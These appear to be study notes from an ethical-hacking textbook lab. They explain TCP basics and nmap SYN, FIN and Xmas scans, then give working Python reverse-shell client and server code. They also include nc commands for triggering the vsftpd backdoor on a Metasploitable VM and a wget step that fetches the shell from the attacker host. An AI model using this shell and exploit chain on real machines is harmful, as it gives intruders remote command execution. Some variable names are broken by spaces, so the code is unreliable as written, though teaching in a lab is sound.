How a file is converted into packets with sequence numbers
Before a file can be transmitted, it must be encapsulated into a packet. However, TCP packets have a maximum size of 64KB, so files larger than this are divided and placed into several TCP packets.
Each packet is assigned a sequence number so that the file can be reassembled.
Sequence numbers are consecutive, which allows the recipient to determine the proper order in which to interpret the packets
however, each machine starts the sequence with a random number to keep hackers from predicting the sequence.
Before two machines can transmit their packets, they must both receive and acknowledge the other machine’s starting sequence number so that they can keep track of any lost packets. This
exchange is a called the TCP three-way handshake.
When the systems have finished exchanging packets, they close the connection by exchanging FIN and ACK packets.
firewalls prevent machines outside the network from initiating connections to servers
inside the network.
However, many firewalls allow the reverse: machines inside the network can still initiate connections to machines outside the network.
How firewalls and NAT block incoming connection, but not outgoing ones
防火墙和NAT如何阻止传入连接而不是传出连接
A reverse shell consists of two parts: a component that connects
to the attacker’s computer, and a shell component that allows an
attacker to execute terminal commands on the victim’s machine.
maps port numbers to their associated services:https://www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.xhtml
Scanning for Open Ports
nmap -s V 192.168.1.101
nmap performs a SYN scan by default. Instead of establishing a full connection, a SYN scan sends TCP SYN packets, listens for SYNACK responses and marks a port as open if it receives a response.
the -sS flag represents the SYN scan
nmap -sS <Metasploitable IP address>
use TCP-FIN packets to bypass firewall protections.
nmap -sF <Metasploitable IP address>
An XMas scan sets the FIN, PSH, and URG flags
in the TCP packet. The PSH and URG flags are rarely used, and
systems often contain incomplete or incorrect implementations of the
TCP/IP standard that don’t handle them uniformly. By examining how
a system responds to these flags, an attacker can infer information
about the TCP/IP implementation and learn about the system
nmap -sX <Metasploitable IP address>
Exploiting a Vulnerable Service
National Vulnerability Database at https://nvd.nist.gov/.
In these cases, an attacker will need to discover an unknown vulnerability. These are called zero-day vulnerabilities because the victim is unaware of them and so has zero days to fix them.
python -m http.server 8000
# 注:在 Python2 中是这样
python -m SimpleHTTPServer 8000
Writing a Reverse Shell Client
reverse Shell.py
import sys
from subprocess import Popen, PIPE
from socket import *
➊
server Name = sys.argv[1]
server Port = 8000
#Create IPv4(AF_INET), TCPSocket(Sock_Stream)
➋
client Socket = socket(AF_INET, SOCK_STREAM)
➌
client Socket.connect((server Name, server Port))
client Socket.send('Bot reporting for duty'.encode())
➍
command = client Socket.recv(4064).decode()
➎
while command != "exit":
➏
proc = Popen(command.split(" "), stdout=PIPE, stderr=PIPE)
➐
result, err = proc.communicate()
client Socket.send(result)
command = (client Socket.recv(4064)).decode()
client Socket.close()
The Popen method ➏ creates a copy, or fork, of the current process, called a subprocess
Writing a TCP Server That Listens for Client Connections
shell Server.py
from socket import *
server Port = 8000
➊
server Socket = socket(AF_INET, SOCK_STREAM)
➋
server Socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
➌
server Socket.bind(('' , server Port))
➍
server Socket.listen(1)
print("Attacker box listening and awaiting instructions")
➎
connection Socket, addr = server Socket.accept()
print("Thanks for connecting to me "
+str(addr))
message = connection Socket.recv(1024)
print(message)
command =""
while command != "exit":
command = input("Please enter a command: ")
connection Socket.send(command.encode())
message = connection Socket.recv(1024).decode()
print(message)
➏
connection Socket.shutdown(SHUT_RDWR)
connection Socket.close()
Start the server:
python3 ~/Desktop/shell/shell Server.py
Loading the Reverse Shell onto the Metasploitable Server
python3 -m http.server 8080
nc <Metasploitable IP address> 21
user Hacker:)
pass invalid
nc <Metasploitable IP address> 6200
mkdir shell
cd shell
wget <Kali IP>:8080/reverse Shell.py
Start the reverse shell on the Metasploitable machine
python reverseShell.py <Kali IP address> &
Switch over to the Kali Linux machine and try executing command: